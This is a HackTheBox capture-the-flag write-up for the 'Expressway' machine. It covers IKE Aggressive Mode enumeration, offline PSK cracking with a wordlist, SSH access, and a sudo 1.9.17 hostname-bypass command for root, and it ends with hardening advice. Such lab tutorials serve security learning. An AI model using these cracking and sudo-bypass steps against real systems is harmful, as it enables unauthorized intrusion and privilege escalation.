Expressway HTB Writeup | HacktheBox | Season 9

Start with a fast TCP and UDP sweep to find services.

nmap -sS -sU -T4 -p- --min-rate 1000 expressway.htb -oA scans/expressway/full
nmap -sC -sV -p22,500 expressway.htb -oA scans/expressway/services

Result: SSH on 22/tcp and an IKE/ISAKMP responder on 500/udp.

Because UDP/500 was open, probe the service with ike-scan. Aggressive Mode often returns identity strings and data useful for offline PSK cracking.

# Main Mode
ike-scan -M expressway.htb


# Aggressive Mode (more verbose / leak-prone)
ike-scan -A expressway.htb > ike-agg.txt

Aggressive Mode returned an identity of ike@expressway.htb and produced an output I saved for cracking.

Save the Aggressive Mode output and run it through your PSK cracking workflow (tooling varies — some tools accept raw ike-scan output; others want pcap conversions).

# output from ike-scan already saved to ike-agg.txt
# feed ike-agg.txt into your preferred PSK-cracking tool with a wordlist
psk-crack-tool -i ike-agg.txt -w /usr/share/wordlists/rockyou.txt -o cracked.txt
# cracked.txt -> PSK: [REDACTED-PSK]

Important: The PSK recovered in the lab is redacted here as [REDACTED-PSK]. Never publish real shared secrets

With the PSK-derived credentials (or the VPN-authenticated session), authenticate to the host and obtain an interactive shell.

ssh ike@expressway.htb
# (authentication method/cleartext password omitted for safety)

Once on the box:

id
hostname
ls -la /home/ike
cat /home/ike/user.txt    # user flag

user.txt was present in /home/ike.

Standard enumeration gave the clues needed for escalation:

uname -a
cat /etc/os-release
sudo -V           # shows Sudo 1.9.17
ps aux
find / -perm -4000 -type f 2>/dev/null
grep -R "offramp" /var/log 2>/dev/null  || true

Important find: logs contained the hostname offramp.expressway.htb, which became useful for the Sudo bypass.

Sudo 1.9.17 is vulnerable to a hostname-bypass edge condition. Using the hostname discovered in logs, the bypass was exercised to escalate to root.

Conceptual (non-weaponized) demonstration:

# confirm sudo version
sudo -V


# attempt host-bypass style invocation (lab PoC)
# NOTE: real PoC code is not pasted here to avoid unsafe distribution
/usr/local/bin/sudo -h offramp.expressway.htb -i
# -> root shell in the lab

After gaining a root shell:

cat /root/root.txt   # root flag

An alternate local exploit (CVE-2025-32463) was also tested and worked as a fallback. 

user.txt found at /home/ike

root.txt found at /root

All sensitive outputs and credentials have been redacted in this public writeup.

1. Replace PSKs with certificate-based IKE authentication, or use long, random PSKs rotated regularly.
2. Disable Aggressive Mode in IKE where not required — it exposes identifying data that eases offline attacks.
3. Patch Sudo to the vendor-fixed versions that address CVE-2025-32462 / CVE-2025-32463.
4. Treat logs as sensitive — avoid leaking internal hostnames and identifiers into world-readable logs.
5. Network segmentation & filtering: restrict UDP/500 to trusted peers and monitor unusual IKE attempts.
6. Harden SSH: limit access, use key-based auth + MFA, and log/alert on anomalous logins.

Access is restricted by HackTheBox rules#

The solution to the problem can be published in the public domain after her retirement.

Look for a non-public solution to the problem in the telegram channel .